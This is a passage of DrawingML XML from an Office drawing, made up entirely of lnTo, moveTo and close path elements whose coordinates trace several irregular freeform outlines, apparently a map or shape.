                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17331" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17273" y="19508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17227" y="19508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17169" y="19508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17124" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17060" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17009" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16983" y="19508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16983" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16999" y="19415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17020" y="19364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17009" y="19332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16978" y="19383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16936" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16890" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16843" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16792" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16740" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16683" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16631" y="19508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16558" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16516" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16464" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16424" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16392" y="19476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16346" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16299" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16243" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16196" y="19569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16144" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16102" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16087" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16035" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16019" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16014" y="19425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15993" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15946" y="19425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15889" y="19434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15842" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15791" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15734" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15682" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15640" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15595" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15569" y="19457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15557" y="19415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15536" y="19383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15517" y="19364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15418" y="19457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15336" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15289" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15246" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15200" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15154" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15107" y="19579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15044" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15013" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14973" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14931" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14879" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14843" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14811" y="19527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14811" y="19476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14806" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14754" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14707" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14662" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14615" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14568" y="19569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14526" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14490" y="19579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14455" y="19598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14417" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14370" y="19662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14318" y="19691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14273" y="19733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14247" y="19774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14210" y="19816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14158" y="19835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14111" y="19845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14059" y="19855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14029" y="19867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13988" y="19919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13962" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13920" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13884" y="20031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13859" y="20073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13816" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13765" y="20134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13718" y="20124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13697" y="20092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13734" y="20041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="19999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13739" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="19919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13795" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13847" y="19845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13868" y="19794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13878" y="19765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13878" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13833" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="19630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13755" y="19620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13713" y="19611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13677" y="19579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13625" y="19630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13583" y="19649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13541" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13515" y="19611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13496" y="19579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13444" y="19569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13423" y="19537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13392" y="19495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="19415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13334" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13293" y="19393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13251" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13199" y="19425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13159" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13112" y="19476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13096" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13049" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13008" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12971" y="19579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12926" y="19620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="19598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12848" y="19630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12801" y="19662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="19681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12707" y="19701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12660" y="19723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12608" y="19752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12563" y="19774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="19826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12490" y="19855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12464" y="19826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12438" y="19784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12391" y="19794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12360" y="19765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12344" y="19723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12304" y="19713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="19742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12241" y="19816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12200" y="19845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12153" y="19855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12111" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12071" y="19906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12024" y="19919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11977" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11925" y="19938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11878" y="19938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11826" y="19938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11640" y="19867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11593" y="19867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11541" y="19867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11494" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11458" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11442" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11385" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11339" y="19906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11319" y="19948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11267" y="19980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11246" y="19938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11215" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11168" y="19896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11138" y="19867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11112" y="19906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11075" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11023" y="19948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10976" y="19980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10930" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10883" y="20009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10836" y="20031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10789" y="20060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10775" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10723" y="20009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10671" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10613" y="20041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="20041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10551" y="19999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10504" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10483" y="20031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10483" y="20073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10432" y="20073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10412" y="20031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10328" y="20050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10313" y="20102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10283" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10240" y="20185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10193" y="20204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10153" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10127" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10116" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10163" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10153" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10116" y="20410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10033" y="20471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9991" y="20503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9946" y="20522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9899" y="20544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9842" y="20564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779" y="20564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9753" y="20573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9701" y="20586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9649" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9619" y="20647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9576" y="20676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9536" y="20708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9473" y="20727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9427" y="20750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9411" y="20769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9421" y="20843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9442" y="20881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9520" y="20881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9593" y="20862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9666" y="20862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="20904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9696" y="20933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9727" y="20965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9597" y="21006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9520" y="21016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9458" y="21035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="21048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9298" y="21058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9251" y="21077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9240" y="21109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9157" y="21099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9065" y="21077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8976" y="21087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8919" y="21109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8851" y="21128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8799" y="21151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8747" y="21180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8716" y="21202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8686" y="21170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8634" y="21138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8556" y="21109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8483" y="21087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380" y="21067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8281" y="21048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8203" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8137" y="20997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8059" y="20974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7970" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7903" y="20923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="20881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7814" y="20852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7795" y="20820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7779" y="20779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7821" y="20750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7892" y="20759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="20727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7882" y="20698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7826" y="20666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7753" y="20647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7722" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="20596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7986" y="20596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8002" y="20554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8043" y="20535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8085" y="20512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8132" y="20493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8177" y="20461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8193" y="20419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8198" y="20390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8250" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8261" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8271" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8255" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="20195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8214" y="20143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8188" y="20102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8151" y="19999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8125" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8095" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8069" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8048" y="19835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8017" y="19794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7976" y="19752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7929" y="19733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="19691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7866" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7861" y="19598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="19547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7892" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7908" y="19476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7950" y="19466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7970" y="19434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="19393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="19354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7918" y="19312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7934" y="19271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7960" y="19239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7986" y="19210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8022" y="19200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8059" y="19219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8073" y="19200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8111" y="19158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8120" y="19117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8085" y="19084"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7696" y="19752"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7659" y="19774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7654" y="19826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7685" y="19919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7696" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="20009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7649" y="20009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7623" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7592" y="20073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7614" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7659" y="20143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="20134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7743" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7737" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7795" y="20163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7835" y="20143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="20124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="20082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7873" y="20041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7821" y="19938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="19887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758" y="19835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7732" y="19794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7696" y="19752"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6457" y="20073"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6441" y="20092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6483" y="20143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6540" y="20163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6592" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6648" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6695" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6732" y="20163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681" y="20102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6639" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6587" y="20102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6519" y="20092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="20073"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5503" y="20246"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5489" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5566" y="20297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5623" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5654" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5560" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503" y="20246"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5680" y="20246"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5696" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762" y="20329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826" y="20329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5680" y="20246"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8976" y="20718"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8924" y="20740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8903" y="20740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8893" y="20779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8877" y="20820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8872" y="20852"/>
